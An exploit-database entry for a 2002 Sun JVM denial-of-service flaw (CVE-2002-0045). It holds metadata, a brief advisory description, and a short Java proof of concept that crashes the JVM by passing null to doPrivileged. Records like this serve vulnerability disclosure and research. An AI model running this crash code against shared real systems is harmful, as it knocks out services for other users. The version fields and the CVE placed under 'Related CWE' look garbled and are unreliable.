Sun Java Virtual Machine Denial of Service Vulnerability

vendor:

Java Virtual Machine

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Java Virtual Machine

Affected Version From: 1.3.2001

Affected Version To: 1.4.2001

Patch Exists: YES

Related CWE: CVE-2002-0045

CPE: a:sun:java_virtual_machine

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2002

Sun Java Virtual Machine Denial of Service Vulnerability

It is possible for a maliciously constructed, valid java program to crash the Sun JVM. This may result in a denial of service attack in a shared environment. The ability to consistantly exploit this vulnerability has been demonstrated on the Linux version of the Sun JVM.

Mitigation:

Ensure that all Java programs are running in a secure environment and that all Java code is properly validated.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3992/info

Java programs run in an intepreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux.

It is possible for a maliciously constructed, valid java program to crash the Sun JVM. This may result in a denial of service attack in a shared environment. The ability to consistantly exploit this vulnerability has been demonstrated on the Linux version of the Sun JVM.

public class CrashMe
{
    public static void main(String[] args)
    {
        java.security.AccessController.doPrivileged
        ((java.security.PrivilegedAction)null);
    }
}